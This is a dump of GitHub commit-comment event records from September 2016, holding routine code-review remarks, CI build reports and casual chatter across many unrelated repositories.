{"id":"4575981361","type":"CommitCommentEvent","actor":{"login":"akashjain132"},"repo":{"name":"sonamsingh28/termcase"},"payload":{"comment":{"id":19059306,"position":8,"line":8,"path":"src/UpdateTerms.php","commit_id":"404cbd03e1af1d16ea6fe4f0788d18c6a07c461f","created_at":"2016-09-16T19:41:58Z","updated_at":"2016-09-16T19:41:58Z","body":"Resolved."}},"created_at":"2016-09-16T19:41:58Z"}
{"id":"4575984122","type":"CommitCommentEvent","actor":{"login":"akashjain132"},"repo":{"name":"sonamsingh28/termcase"},"payload":{"comment":{"id":19059315,"position":10,"line":10,"path":"src/UpdateTerms.php","commit_id":"404cbd03e1af1d16ea6fe4f0788d18c6a07c461f","created_at":"2016-09-16T19:42:33Z","updated_at":"2016-09-16T19:42:33Z","body":"Resolved."}},"created_at":"2016-09-16T19:42:33Z"}
{"id":"4575986377","type":"CommitCommentEvent","actor":{"login":"TheDiamondYT1"},"repo":{"name":"minecrafter/voxelwind"},"payload":{"comment":{"id":19059321,"position":7,"line":65,"path":"server/src/main/java/com/voxelwind/server/game/level/block/BlockBehaviors.java","commit_id":"655dffbda63fdb22702c60ba8e3ea2522ad79996","created_at":"2016-09-16T19:43:02Z","updated_at":"2016-09-16T19:43:02Z","body":"Since when is that a block lol"}},"created_at":"2016-09-16T19:43:02Z"}
{"id":"4575988622","type":"CommitCommentEvent","actor":{"login":"chelseakomlo"},"repo":{"name":"twstrike/otrv4"},"payload":{"comment":{"id":19059326,"position":3,"line":3,"path":"glossary.md","commit_id":"03386263dfdc6a081212ee26a2767ad9ef8350d2","created_at":"2016-09-16T19:43:30Z","updated_at":"2016-09-16T19:43:30Z","body":"Hey- not sure where we are using/should be using this term? "}},"created_at":"2016-09-16T19:43:30Z"}
{"id":"4575990103","type":"CommitCommentEvent","actor":{"login":"minecrafter"},"repo":{"name":"minecrafter/voxelwind"},"payload":{"comment":{"id":19059331,"position":7,"line":65,"path":"server/src/main/java/com/voxelwind/server/game/level/block/BlockBehaviors.java","commit_id":"655dffbda63fdb22702c60ba8e3ea2522ad79996","created_at":"2016-09-16T19:43:50Z","updated_at":"2016-09-16T19:43:50Z","body":"Monster egg blocks refer to blocks that spawn silverfish when broken."}},"created_at":"2016-09-16T19:43:50Z"}
{"id":"4575991812","type":"CommitCommentEvent","actor":{"login":"akashjain132"},"repo":{"name":"sonamsingh28/termcase"},"payload":{"comment":{"id":19059338,"position":19,"line":19,"path":"src/UpdateTerms.php","commit_id":"354d13604ed9e1ac2e22e324370541e6a160ea94","created_at":"2016-09-16T19:44:12Z","updated_at":"2016-09-16T19:44:12Z","body":"Why u wrote nodes here, You are not processing nodes."}},"created_at":"2016-09-16T19:44:12Z"}
{"id":"4575992544","type":"CommitCommentEvent","actor":{"login":"akashjain132"},"repo":{"name":"sonamsingh28/termcase"},"payload":{"comment":{"id":19059339,"position":18,"line":18,"path":"src/UpdateTerms.php","commit_id":"404cbd03e1af1d16ea6fe4f0788d18c6a07c461f","created_at":"2016-09-16T19:44:21Z","updated_at":"2016-09-16T19:44:21Z","body":"Resolved."}},"created_at":"2016-09-16T19:44:21Z"}
{"id":"4575993535","type":"CommitCommentEvent","actor":{"login":"eliasdorneles"},"repo":{"name":"eliasdorneles/scrapy"},"payload":{"comment":{"id":19059343,"position":11,"line":414,"path":"docs/intro/tutorial.rst","commit_id":"b2a5cddbb01e3970ce1e38e821a76c7d10520845","created_at":"2016-09-16T19:44:35Z","updated_at":"2016-09-16T19:44:35Z","body":"I think we're okay, I wanted to introduce the subject as generic link following, the next paragraph specifies it's about following the link to the next page."}},"created_at":"2016-09-16T19:44:35Z"}
{"id":"4575993611","type":"CommitCommentEvent","actor":{"login":"akashjain132"},"repo":{"name":"sonamsingh28/termcase"},"payload":{"comment":{"id":19059344,"position":2,"line":2,"path":"src/VocabularyListBuilder.php","commit_id":"404cbd03e1af1d16ea6fe4f0788d18c6a07c461f","created_at":"2016-09-16T19:44:36Z","updated_at":"2016-09-16T19:44:36Z","body":"Resolved."}},"created_at":"2016-09-16T19:44:36Z"}
{"id":"4575996484","type":"CommitCommentEvent","actor":{"login":"jojo12"},"repo":{"name":"jemproject/JEM-Project"},"payload":{"comment":{"id":19059351,"position":null,"line":null,"path":null,"commit_id":"e8813722207da34bdaa3cfd2925d4376f34c568d","created_at":"2016-09-16T19:45:14Z","updated_at":"2016-09-16T19:45:14Z","body":"I am so sorry, Hoffi, I will not do it anymore! "}},"created_at":"2016-09-16T19:45:14Z"}
{"id":"4575997818","type":"CommitCommentEvent","actor":{"login":"evilaliv3"},"repo":{"name":"globaleaks/GlobaLeaks"},"payload":{"comment":{"id":19059354,"position":5,"line":74,"path":"backend/globaleaks/models/l10n.py","commit_id":"2f4ff3ca74024fa467331e1dee8746eaf4e7ff8c","created_at":"2016-09-16T19:45:28Z","updated_at":"2016-09-16T19:45:28Z","body":"@NSkelsey: what a bad guy you are!"}},"created_at":"2016-09-16T19:45:28Z"}
{"id":"4575999000","type":"CommitCommentEvent","actor":{"login":"sterl16"},"repo":{"name":"sterl16/sterling_conceptions"},"payload":{"comment":{"id":19059360,"position":null,"line":null,"path":null,"commit_id":"8ac4d7a815a2f9242277b4902f32cd9c972e7f9b","created_at":"2016-09-16T19:45:45Z","updated_at":"2016-09-16T19:45:45Z","body":"test"}},"created_at":"2016-09-16T19:45:45Z"}
{"id":"4575999319","type":"CommitCommentEvent","actor":{"login":"ninaholic"},"repo":{"name":"puppylinux-woof-CE/woof-CE"},"payload":{"comment":{"id":19059361,"position":null,"line":null,"path":null,"commit_id":"2a30cb97d45dbeb7a4009dcd92480b6b7b34aa5d","created_at":"2016-09-16T19:45:48Z","updated_at":"2016-09-16T19:45:48Z","body":"Hi wdlkmpx,\r\n\r\nI thought the message it would give me now would be (because I have no CD drive):\r\n\r\n\"No drives found\"\r\n\r\nBut what the CD-Rom button actually gives me now is:\r\n\r\n\"Installing to CD/DVD is not supported by this program. Please use the 'Remaster Puppy Live CD' program or save back to CD/DVD at shut down which requires a CD-RW or DVD-RW.\"\r\n\r\nDid I mess something up? This is in Slacko 6.9.6.1 32-bit."}},"created_at":"2016-09-16T19:45:48Z"}
{"id":"4576000163","type":"CommitCommentEvent","actor":{"login":"PierreR"},"repo":{"name":"NixOS/nixpkgs"},"payload":{"comment":{"id":19059363,"position":null,"line":null,"path":null,"commit_id":"68f43cf9a9c7189a938fbff7f4debf811c28c891","created_at":"2016-09-16T19:45:58Z","updated_at":"2016-09-16T19:45:58Z","body":"`language-puppet` was not failing on  `x86_64-linux`. Is it possible to put it back ? "}},"created_at":"2016-09-16T19:45:58Z"}
{"id":"4576001966","type":"CommitCommentEvent","actor":{"login":"TonkomoLLC"},"repo":{"name":"TonkomoLLC/chtMultiRegionReactingFoam-OpenFOAM4"},"payload":{"comment":{"id":19059368,"position":null,"line":null,"path":null,"commit_id":"2e859b58f3ff4d975dcb79b227067254695fe536","created_at":"2016-09-16T19:46:22Z","updated_at":"2016-09-16T19:46:22Z","body":"Set the turbulence into the reaction model"}},"created_at":"2016-09-16T19:46:22Z"}
{"id":"4576003874","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19059371,"position":null,"line":null,"path":null,"commit_id":"c6ca9c01b2e696622b61627f48a8bf9a55b3f06e","created_at":"2016-09-16T19:46:45Z","updated_at":"2016-09-16T19:46:45Z","body":"ASIHPValidation (shenb) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug: OK (1190 of 1190 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-c6ca9c01b2e696622b61627f48a8bf9a55b3f06e-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-c6ca9c01b2e696622b61627f48a8bf9a55b3f06e-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-c6ca9c01b2e696622b61627f48a8bf9a55b3f06e-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-36.1%25-green.svg)</a>\n"}},"created_at":"2016-09-16T19:46:45Z"}
{"id":"4576004172","type":"CommitCommentEvent","actor":{"login":"facelesspanda"},"repo":{"name":"facelesspanda/almo"},"payload":{"comment":{"id":19059372,"position":null,"line":null,"path":null,"commit_id":"b9e587f7c762637fa4df5ba1a8f87e5fded41b79","created_at":"2016-09-16T19:46:49Z","updated_at":"2016-09-16T19:46:49Z","body":"cool :smiley:\r\nce week-end je vois pour DL xspim pour windows si ça existe x)"}},"created_at":"2016-09-16T19:46:49Z"}
{"id":"4576004704","type":"CommitCommentEvent","actor":{"login":"akashjain132"},"repo":{"name":"sonamsingh28/termcase"},"payload":{"comment":{"id":19059374,"position":5,"line":5,"path":"termcase.info.yml","commit_id":"404cbd03e1af1d16ea6fe4f0788d18c6a07c461f","created_at":"2016-09-16T19:46:56Z","updated_at":"2016-09-16T19:46:56Z","body":"package: Taxonomy"}},"created_at":"2016-09-16T19:46:56Z"}
{"id":"4576005074","type":"CommitCommentEvent","actor":{"login":"NickleDave"},"repo":{"name":"NickleDave/hybrid-deep-finch"},"payload":{"comment":{"id":19059375,"position":null,"line":null,"path":null,"commit_id":"11677e865b40ecad827dda2f5df46ce489532684","created_at":"2016-09-16T19:47:01Z","updated_at":"2016-09-16T19:47:01Z","body":"Factor out concatenation of feature files from feature extraction for support vector machine code. This way classify.py can loop across feature files within directory. I am now undecided on whether there's any advantage to doing it this way. The alternative would be to extract features and at the same time concatenate them into one big file, then use that big file to classify. Later you'd have to re-assign labels to the individual song files. At least this way the 'method' of feature extraction is consistent for both algorithms."}},"created_at":"2016-09-16T19:47:01Z"}
{"id":"4576006867","type":"CommitCommentEvent","actor":{"login":"akashjain132"},"repo":{"name":"sonamsingh28/termcase"},"payload":{"comment":{"id":19059389,"position":12,"line":12,"path":"termcase.module","commit_id":"404cbd03e1af1d16ea6fe4f0788d18c6a07c461f","created_at":"2016-09-16T19:47:26Z","updated_at":"2016-09-16T19:47:26Z","body":"Resolved."}},"created_at":"2016-09-16T19:47:26Z"}
{"id":"4576009901","type":"CommitCommentEvent","actor":{"login":"akashjain132"},"repo":{"name":"sonamsingh28/termcase"},"payload":{"comment":{"id":19059400,"position":95,"line":95,"path":"termcase.module","commit_id":"404cbd03e1af1d16ea6fe4f0788d18c6a07c461f","created_at":"2016-09-16T19:48:07Z","updated_at":"2016-09-16T19:48:07Z","body":"Resolved."}},"created_at":"2016-09-16T19:48:07Z"}
{"id":"4576010069","type":"CommitCommentEvent","actor":{"login":"ZhengRaymond"},"repo":{"name":"ZhengRaymond/GENESYS"},"payload":{"comment":{"id":19059402,"position":null,"line":null,"path":null,"commit_id":"b26bc092fb518e44b5e681772a2f56ce86dbf3e1","created_at":"2016-09-16T19:48:09Z","updated_at":"2016-09-16T19:48:09Z","body":"Created readme"}},"created_at":"2016-09-16T19:48:09Z"}
{"id":"4576010890","type":"CommitCommentEvent","actor":{"login":"akashjain132"},"repo":{"name":"sonamsingh28/termcase"},"payload":{"comment":{"id":19059407,"position":98,"line":98,"path":"termcase.module","commit_id":"404cbd03e1af1d16ea6fe4f0788d18c6a07c461f","created_at":"2016-09-16T19:48:19Z","updated_at":"2016-09-16T19:48:19Z","body":"Resolved."}},"created_at":"2016-09-16T19:48:19Z"}
{"id":"4576012349","type":"CommitCommentEvent","actor":{"login":"zacharyacutey"},"repo":{"name":"JoinRajuncraftNow/CSE"},"payload":{"comment":{"id":19059412,"position":null,"line":null,"path":null,"commit_id":"aa4d28263c904937daf6d239377d556704d44f0a","created_at":"2016-09-16T19:48:39Z","updated_at":"2016-09-16T19:48:39Z","body":"It does do something: ANNOY ME."}},"created_at":"2016-09-16T19:48:39Z"}
{"id":"4576012599","type":"CommitCommentEvent","actor":{"login":"adictovirtual"},"repo":{"name":"f12/structure-api"},"payload":{"comment":{"id":19059413,"position":6,"line":330,"path":"src/lib/database/migrations.js","commit_id":"cdb3fec090c973574bba254e6a54ebe9a65c8212","created_at":"2016-09-16T19:48:43Z","updated_at":"2016-09-16T19:48:43Z","body":"@chrisabrams well i just needed to clean the data, drop the table implies re-create,re-define indexes.\r\nwell i'm just creating an array of promises, later i use `promise.all` to resolve them. i read that beforeEach wait if the return value is a promise."}},"created_at":"2016-09-16T19:48:43Z"}
{"id":"4576015394","type":"CommitCommentEvent","actor":{"login":"akashjain132"},"repo":{"name":"sonamsingh28/termcase"},"payload":{"comment":{"id":19059420,"position":106,"line":106,"path":"termcase.module","commit_id":"404cbd03e1af1d16ea6fe4f0788d18c6a07c461f","created_at":"2016-09-16T19:49:20Z","updated_at":"2016-09-16T19:49:20Z","body":"Resolved."}},"created_at":"2016-09-16T19:49:20Z"}
{"id":"4576015933","type":"CommitCommentEvent","actor":{"login":"akashjain132"},"repo":{"name":"sonamsingh28/termcase"},"payload":{"comment":{"id":19059423,"position":113,"line":113,"path":"termcase.module","commit_id":"404cbd03e1af1d16ea6fe4f0788d18c6a07c461f","created_at":"2016-09-16T19:49:27Z","updated_at":"2016-09-16T19:49:27Z","body":"Resolved."}},"created_at":"2016-09-16T19:49:27Z"}
{"id":"4576017807","type":"CommitCommentEvent","actor":{"login":"akashjain132"},"repo":{"name":"sonamsingh28/termcase"},"payload":{"comment":{"id":19059428,"position":184,"line":184,"path":"termcase.module","commit_id":"404cbd03e1af1d16ea6fe4f0788d18c6a07c461f","created_at":"2016-09-16T19:49:51Z","updated_at":"2016-09-16T19:49:51Z","body":"Resolved."}},"created_at":"2016-09-16T19:49:51Z"}
{"id":"4576018985","type":"CommitCommentEvent","actor":{"login":"akashjain132"},"repo":{"name":"sonamsingh28/termcase"},"payload":{"comment":{"id":19059431,"position":191,"line":191,"path":"termcase.module","commit_id":"404cbd03e1af1d16ea6fe4f0788d18c6a07c461f","created_at":"2016-09-16T19:50:08Z","updated_at":"2016-09-16T19:50:08Z","body":"Resolved."}},"created_at":"2016-09-16T19:50:08Z"}
{"id":"4576019932","type":"CommitCommentEvent","actor":{"login":"akashjain132"},"repo":{"name":"sonamsingh28/termcase"},"payload":{"comment":{"id":19059434,"position":207,"line":207,"path":"termcase.module","commit_id":"404cbd03e1af1d16ea6fe4f0788d18c6a07c461f","created_at":"2016-09-16T19:50:17Z","updated_at":"2016-09-16T19:50:17Z","body":"Resolved."}},"created_at":"2016-09-16T19:50:17Z"}
{"id":"4576020426","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19059436,"position":null,"line":null,"path":null,"commit_id":"1353c0c04d887cbe2318b7a4dd5e5f00de046b73","created_at":"2016-09-16T19:50:24Z","updated_at":"2016-09-16T19:50:24Z","body":"input_processor_refactor (mbadams5) - x86_64-MacOS-10.9-clang: Tests Failed (1789 of 2353 tests passed, 19 test warnings)\n\n * 260 tests had: AUD diffs.\n * 243 tests had: EIO diffs.\n * 234 tests had: Table big diffs.\n * 46 tests had: RDD diffs.\n * 50 tests had: ERR diffs.\n * 166 tests had: MTD diffs.\n * 114 tests had: DXF diffs.\n * 1 test had: S...\n * 183 tests had: SHD diffs.\n * 179 tests had: BND diffs.\n * 150 tests had: MDD diffs.\n * 3 tests had: delightin diffs.\n * 3 tests had: delightout diffs.\n * 6 tests had: ESO small diffs.\n * 8 tests had: MTR big diffs.\n * 10 tests had: ESO big diffs.\n * 1 test had: M...\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-1353c0c04d887cbe2318b7a4dd5e5f00de046b73-x86_64-MacOS-10.9-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-1353c0c04d887cbe2318b7a4dd5e5f00de046b73-x86_64-MacOS-10.9-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-76.03%25-red.svg)</a> \n"}},"created_at":"2016-09-16T19:50:24Z"}
{"id":"4576020984","type":"CommitCommentEvent","actor":{"login":"chrisabrams"},"repo":{"name":"f12/structure-api"},"payload":{"comment":{"id":19059437,"position":6,"line":330,"path":"src/lib/database/migrations.js","commit_id":"cdb3fec090c973574bba254e6a54ebe9a65c8212","created_at":"2016-09-16T19:50:31Z","updated_at":"2016-09-16T19:50:31Z","body":"OIC you are deleting the table. Got it. Yes it should handle promises."}},"created_at":"2016-09-16T19:50:31Z"}
{"id":"4576024324","type":"CommitCommentEvent","actor":{"login":"sn0w"},"repo":{"name":"sn0w/shiro"},"payload":{"comment":{"id":19059445,"position":null,"line":null,"path":null,"commit_id":"1afe3294058de1efb6c0fa8a7404b966e0835b47","created_at":"2016-09-16T19:51:15Z","updated_at":"2016-09-16T19:51:15Z","body":"![](http://i.imgur.com/iY4qVVA.png)"}},"created_at":"2016-09-16T19:51:15Z"}
{"id":"4576027602","type":"CommitCommentEvent","actor":{"login":"khawkins"},"repo":{"name":"forcedotcom/SalesforceMobileSDK-iOS"},"payload":{"comment":{"id":19059453,"position":7,"line":7,"path":"libs/SalesforceHybridSDK/SalesforceHybridSDKTestApp/SalesforceHybridSDKTestApp.entitlements","commit_id":"d05791682188b35e270cc389ee14abf051d69df3","created_at":"2016-09-16T19:51:58Z","updated_at":"2016-09-16T19:51:58Z","body":"It's just the way the entitlements pieces are set up by default.  The format is actually different from a stock BundleID; it's generally like `<Team Identifier>`.`<Bundle ID>`.  At any rate, the value in here doesn't really matter, since we're not even messing with the entitlements it's setting, just trying to get past a bug."}},"created_at":"2016-09-16T19:51:58Z"}
{"id":"4576028382","type":"CommitCommentEvent","actor":{"login":"tjgillies"},"repo":{"name":"matrix-org/matrix-react-sdk"},"payload":{"comment":{"id":19059455,"position":null,"line":null,"path":null,"commit_id":"c322a191af8907c27f837ca5f6ba9dcca0f6e51a","created_at":"2016-09-16T19:52:08Z","updated_at":"2016-09-16T19:52:08Z","body":"👍 "}},"created_at":"2016-09-16T19:52:08Z"}
{"id":"4576029491","type":"CommitCommentEvent","actor":{"login":"khawkins"},"repo":{"name":"forcedotcom/SalesforceMobileSDK-iOS"},"payload":{"comment":{"id":19059456,"position":47,"line":1689,"path":"libs/SalesforceHybridSDK/SalesforceHybridSDK.xcodeproj/project.pbxproj","commit_id":"d05791682188b35e270cc389ee14abf051d69df3","created_at":"2016-09-16T19:52:21Z","updated_at":"2016-09-16T19:52:21Z","body":"These need to be removed."}},"created_at":"2016-09-16T19:52:21Z"}
{"id":"4576030280","type":"CommitCommentEvent","actor":{"login":"khawkins"},"repo":{"name":"forcedotcom/SalesforceMobileSDK-iOS"},"payload":{"comment":{"id":19059457,"position":21,"line":1262,"path":"libs/SalesforceHybridSDK/SalesforceHybridSDK.xcodeproj/project.pbxproj","commit_id":"d05791682188b35e270cc389ee14abf051d69df3","created_at":"2016-09-16T19:52:31Z","updated_at":"2016-09-16T19:52:31Z","body":"These need to be removed."}},"created_at":"2016-09-16T19:52:31Z"}
{"id":"4576031167","type":"CommitCommentEvent","actor":{"login":"dannymcpherson"},"repo":{"name":"RetailMeNotSandbox/dart"},"payload":{"comment":{"id":19059459,"position":18,"line":27,"path":"src/python/dart/service/email.py","commit_id":"0c0d837e1d2748a20a99fe5f83d64e9de79453ff","created_at":"2016-09-16T19:52:45Z","updated_at":"2016-09-16T19:52:45Z","body":"Yay!  Thanks for doing this!  I had been meaning to suggest it.  One thing I would recommend though - Change the dart_host lookup to include the url scheme.  Some companies may require https.  Isn't this already available in the yaml config somewhere?"}},"created_at":"2016-09-16T19:52:45Z"}
{"id":"4576032786","type":"CommitCommentEvent","actor":{"login":"SergeyBushuev"},"repo":{"name":"SergeyBushuev/Stack"},"payload":{"comment":{"id":19059465,"position":null,"line":null,"path":null,"commit_id":"795051ffcfe6ed79773749f467a5c9214003491d","created_at":"2016-09-16T19:53:08Z","updated_at":"2016-09-16T19:53:08Z","body":"Добавлено Copy"}},"created_at":"2016-09-16T19:53:08Z"}
{"id":"4576033529","type":"CommitCommentEvent","actor":{"login":"khawkins"},"repo":{"name":"forcedotcom/SalesforceMobileSDK-iOS"},"payload":{"comment":{"id":19059467,"position":7,"line":7,"path":"libs/SalesforceHybridSDK/SalesforceHybridSDKTestApp/SalesforceHybridSDKTestApp.entitlements","commit_id":"d05791682188b35e270cc389ee14abf051d69df3","created_at":"2016-09-16T19:53:16Z","updated_at":"2016-09-16T19:53:16Z","body":"Oh I see what you're saying with respect to the other entitlements though.  Wonder if the Bundle ID is wonky on this particular app."}},"created_at":"2016-09-16T19:53:16Z"}
{"id":"4576033483","type":"CommitCommentEvent","actor":{"login":"mourner"},"repo":{"name":"webgeodatavore/supercluster"},"payload":{"comment":{"id":19059468,"position":17,"line":12,"path":"package.json","commit_id":"93612952708347d7509991c107f2036be5708ecb","created_at":"2016-09-16T19:53:17Z","updated_at":"2016-09-16T19:53:17Z","body":"`mkdir` is not cross-platform. Do `npm install --save-dev mkdirp` and then use `mkdirp`."}},"created_at":"2016-09-16T19:53:17Z"}
{"id":"4576033717","type":"CommitCommentEvent","actor":{"login":"facelesspanda"},"repo":{"name":"facelesspanda/almo"},"payload":{"comment":{"id":19059470,"position":null,"line":null,"path":null,"commit_id":"b9e587f7c762637fa4df5ba1a8f87e5fded41b79","created_at":"2016-09-16T19:53:20Z","updated_at":"2016-09-16T19:53:20Z","body":"Oh bah non, parce que xspim c'est trop vieux et plus maintenu xD\r\n\r\nhttp://spimsimulator.sourceforge.net/\r\ny'a QtSpim maintenant, disponible sur tout OS"}},"created_at":"2016-09-16T19:53:20Z"}
{"id":"4576034342","type":"CommitCommentEvent","actor":{"login":"athoik"},"repo":{"name":"Dima73/enigma2"},"payload":{"comment":{"id":19059473,"position":null,"line":null,"path":null,"commit_id":"d214f48a253b3d181080f4420df4660308b9d220","created_at":"2016-09-16T19:53:28Z","updated_at":"2016-09-16T19:53:28Z","body":"Why don't you use `fileExists` and move SystemInfo[\"CommonInterfaceCIDelay\"] init in SystemInfo?"}},"created_at":"2016-09-16T19:53:28Z"}
{"id":"4576035314","type":"CommitCommentEvent","actor":{"login":"dw9694"},"repo":{"name":"dw9694/django_blog"},"payload":{"comment":{"id":19059482,"position":5,"line":9,"path":"blog/forms.py","commit_id":"b6589bbd4ad96888a89832457ead3dfb05a2fb51","created_at":"2016-09-16T19:53:41Z","updated_at":"2016-09-16T19:53:41Z","body":"add tag"}},"created_at":"2016-09-16T19:53:41Z"}
{"id":"4576035858","type":"CommitCommentEvent","actor":{"login":"evilaliv3"},"repo":{"name":"globaleaks/GlobaLeaks"},"payload":{"comment":{"id":19059485,"position":null,"line":null,"path":null,"commit_id":"98a92eeb0f03c121a441903e02508dad21957607","created_at":"2016-09-16T19:53:49Z","updated_at":"2016-09-16T19:53:49Z","body":"@NSkelsey: we are friend in typ0!"}},"created_at":"2016-09-16T19:53:49Z"}
{"id":"4576038177","type":"CommitCommentEvent","actor":{"login":"mcifani"},"repo":{"name":"steemit/steemit.com"},"payload":{"comment":{"id":19059488,"position":null,"line":null,"path":null,"commit_id":"39ca60b5fb3c1a4a4d820232419dd9036e95ffb0","created_at":"2016-09-16T19:54:20Z","updated_at":"2016-09-16T19:54:20Z","body":"Updated the conditional.  Should be good for now to display none top-level until the API is updated.. I'll switch once that's released.  "}},"created_at":"2016-09-16T19:54:20Z"}
{"id":"4576038431","type":"CommitCommentEvent","actor":{"login":"Hoffi1"},"repo":{"name":"jemproject/JEM-Project"},"payload":{"comment":{"id":19059490,"position":null,"line":null,"path":null,"commit_id":"e8813722207da34bdaa3cfd2925d4376f34c568d","created_at":"2016-09-16T19:54:24Z","updated_at":"2016-09-16T19:54:24Z","body":"No drama. But I would prefer to talk and try to get consense first. Also a PR would be possible - but in this little case a real overkill, of course."}},"created_at":"2016-09-16T19:54:24Z"}
{"id":"4576038770","type":"CommitCommentEvent","actor":{"login":"dannymcpherson"},"repo":{"name":"RetailMeNotSandbox/dart"},"payload":{"comment":{"id":19059493,"position":32,"line":50,"path":"src/python/dart/service/email.py","commit_id":"0c0d837e1d2748a20a99fe5f83d64e9de79453ff","created_at":"2016-09-16T19:54:28Z","updated_at":"2016-09-16T19:54:28Z","body":"Yikes!  Won't changing the prefix potentially affect email filtering rules?"}},"created_at":"2016-09-16T19:54:28Z"}
{"id":"4576039884","type":"CommitCommentEvent","actor":{"login":"usernamesuggestion"},"repo":{"name":"wheatable/AdventureB"},"payload":{"comment":{"id":19059498,"position":null,"line":null,"path":null,"commit_id":"e5a6c1802966699ba0c1a664fd2eb7b3df2d8ec0","created_at":"2016-09-16T19:54:42Z","updated_at":"2016-09-16T19:54:42Z","body":"got this in my email too. NEAT!\n\n\nOn Fri, Sep 16, 2016 at 10:07 AM wheatable <notifications@github.com> wrote:\n\n> I also want to test out this comment thing. Will it notify me of comments\n> in slack? I'm sure. Will it save the comments elsewhere? We will see!\n>\n> —\n> You are receiving this because you are subscribed to this thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/wheatable/AdventureB/commit/e5a6c1802966699ba0c1a664fd2eb7b3df2d8ec0#commitcomment-19056378>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AI6U9gPvZKdWN3POe7FCvphEOYttRrk0ks5qqr7AgaJpZM4J_GSU>\n> .\n>\n"}},"created_at":"2016-09-16T19:54:42Z"}
{"id":"4576043716","type":"CommitCommentEvent","actor":{"login":"patrickprek12"},"repo":{"name":"WSDrees/cowbell.js"},"payload":{"comment":{"id":19059514,"position":null,"line":null,"path":null,"commit_id":"dba0c7e3af0ec84181271a540ecdc223f89d64c6","created_at":"2016-09-16T19:55:34Z","updated_at":"2016-09-16T19:55:34Z","body":"\"Everybody needs more cowbell.js\""}},"created_at":"2016-09-16T19:55:34Z"}
{"id":"4576048316","type":"CommitCommentEvent","actor":{"login":"dsuare1"},"repo":{"name":"dsuare1/the_round_about"},"payload":{"comment":{"id":19059527,"position":null,"line":null,"path":null,"commit_id":"183a5897814c10363f8d6d47a9ca183355125d10","created_at":"2016-09-16T19:56:36Z","updated_at":"2016-09-16T19:56:36Z","body":"-added 'express-handlebars' as the view engine\r\n-completely designed landing page; need to add more media queries\r\n-used flexbox for most aligning"}},"created_at":"2016-09-16T19:56:36Z"}
{"id":"4576049959","type":"CommitCommentEvent","actor":{"login":"MSF-Jarvis"},"repo":{"name":"ChikaraOSP/build"},"payload":{"comment":{"id":19059532,"position":null,"line":null,"path":null,"commit_id":"76842254bdce3e267beae006026d0cae2629e707","created_at":"2016-09-16T19:56:57Z","updated_at":"2016-09-16T19:56:57Z","body":"The word is deprecated, but never mind"}},"created_at":"2016-09-16T19:56:57Z"}
{"id":"4576059387","type":"CommitCommentEvent","actor":{"login":"grandbora"},"repo":{"name":"grandbora/prometheus"},"payload":{"comment":{"id":19059557,"position":6,"line":312,"path":"web/web.go","commit_id":"802a0a61727e9c8ebad13842b776865fd42ba443","created_at":"2016-09-16T19:59:05Z","updated_at":"2016-09-16T19:59:05Z","body":"I need help here.\r\n```go\r\nfmt.Println(r.URL.Fragment) // prints empty string\r\n```\r\nThe above code always prints empty string no matter what I sent in the fragment. Is this a known issue? Am I missing anything?\r\n\r\ncc @beorn7 @grobie @fabxc @juliusv\r\n\r\n\r\n"}},"created_at":"2016-09-16T19:59:05Z"}
{"id":"4576060893","type":"CommitCommentEvent","actor":{"login":"Ordenkrieger"},"repo":{"name":"sud-vastav/android_device_oneplus_onyx"},"payload":{"comment":{"id":19059563,"position":null,"line":null,"path":null,"commit_id":"36966fd3a7caced28fea663d77847f55dad7a71c","created_at":"2016-09-16T19:59:24Z","updated_at":"2016-09-16T19:59:24Z","body":"Im wondering how old are you guys? "}},"created_at":"2016-09-16T19:59:24Z"}
{"id":"4576061927","type":"CommitCommentEvent","actor":{"login":"thbar"},"repo":{"name":"smiley325/quantum-elixir"},"payload":{"comment":{"id":19059564,"position":null,"line":null,"path":null,"commit_id":"4da56af2ddf514e0bd906998a356eb66cdc81352","created_at":"2016-09-16T19:59:37Z","updated_at":"2016-09-16T19:59:37Z","body":"@smiley325 no problem with the delay - we have lives :-) Great, thanks for the feedback!"}},"created_at":"2016-09-16T19:59:37Z"}
{"id":"4571807159","type":"CommitCommentEvent","actor":{"login":"pawaitemadisoncollege"},"repo":{"name":"MadJavaEntFall2016/santa-in-an-elevator-week-2-exercise-1-jpauley16"},"payload":{"comment":{"id":19047522,"position":43,"line":72,"path":"src/main/java/edu/madisoncollege/entjava/SantaInAnElevator.java","commit_id":"b5d720e8c3a0fa70e5f22c90b1b930f924a3edbb","created_at":"2016-09-16T02:00:14Z","updated_at":"2016-09-16T02:00:14Z","body":"Log this exception rather than printing the stack - this will currently go to the console/server files\r\n"}},"created_at":"2016-09-16T02:00:14Z"}
{"id":"4571807345","type":"CommitCommentEvent","actor":{"login":"MAmelia"},"repo":{"name":"tec-webII-2n11/patrick-luizVinicius"},"payload":{"comment":{"id":19047523,"position":null,"line":null,"path":null,"commit_id":"866c9d0664a7372ad21826dbc0d9d7cf45c1e10e","created_at":"2016-09-16T02:00:17Z","updated_at":"2016-09-16T02:00:17Z","body":"Ótimo. Falta o mapa de navegação e o  wireframe"}},"created_at":"2016-09-16T02:00:17Z"}
